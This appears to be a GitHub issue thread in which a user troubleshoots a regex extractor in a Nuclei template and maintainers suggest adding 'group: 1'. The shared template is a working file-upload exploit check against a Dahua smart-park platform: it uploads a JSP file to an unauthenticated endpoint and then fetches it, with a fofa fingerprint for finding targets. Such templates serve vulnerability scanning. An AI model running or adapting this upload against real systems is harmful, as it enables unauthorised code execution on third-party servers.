Questions about regex in the Nuclei.

[qianbenhyu]

when I write a template, I meet a problem.
as you see, debug tells me "resolved variables found: xxx", I tried twice, but cannot deal with it.

[tarunKoyalwar]

@qianbenhyu , from limited view of your template it seems like you are adding -raw twice (which is like a boundary for matchers/extractors` just remove that last one and it should work now

[qianbenhyu]

it cannot works,
such response like

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json;charset=UTF-8
Date: Thu, 24 Aug 2023 02:29:46 GMT
Server: Apache-Coyote/1.1

{"code":1,"data":"ico_res_e2d16c4abe1b_on.jsp"}

regex:

    extractors:
      - type: regex
        name: xxx
        part: body
        regex:
          - 'ico_res_(.*?)_on.jsp'
        internal: true

[qianbenhyu]

@qianbenhyu , from limited view of your template it seems like you are adding -raw twice (which is like a boundary for matchers/extractors` just remove that last one and it should work now

it cannot works,
such response like

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json;charset=UTF-8
Date: Thu, 24 Aug 2023 02:29:46 GMT
Server: Apache-Coyote/1.1

{"code":1,"data":"ico_res_e2d16c4abe1b_on.jsp"}
regex:

extractors:
  - type: regex
    name: xxx
    part: body
    regex:
      - 'ico_res_(.*?)_on.jsp'
    internal: true

[ehsandeep]

@qianbenhyu it should work, do you have an example / complete template to share?

[qianbenhyu]

@qianbenhyu it should work, do you have an example / complete template to share?

id: dahua_zhihuiyuanqu_info_leak

info:
  name: dahua_zhihuiyuanqu_rce
  author: huangyu
  severity: high
  description: fofa:WPMS/asset/lib/gridster/
  reference:
    - https://github.com/sunyixuan1228/cve/blob/main/RuiJie-EG.md
  tags: tags

requests:
  - raw:
      - |
        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        User-Agent: Java/1.8.0_345
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Content-Length: 243
        Connection: close

        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        Content-Disposition: form-data; name="upload"; filename="1.jsp"
        Content-Type: application/octet-stream
        Content-Transfer-Encoding: binary

        <%out.println("{{randstr}}");%>
        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
        
      - |
        GET /upload/emap/society_new/ico_res_(.*?)_on.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Java/1.8.0_345
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close

    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

    extractors:
      - type: regex
        name: xxx
        part: body
        regex:
          - 'ico_res_(.*?)_on.jsp'
        internal: true
    ```

[ehsandeep]

@qianbenhyu you need to use group: 1.

    extractors:
      - type: regex
        name: xxx
        group: 1
        part: body
        regex:
          - 'ico_res_(.*?)_on.jsp'
        internal: true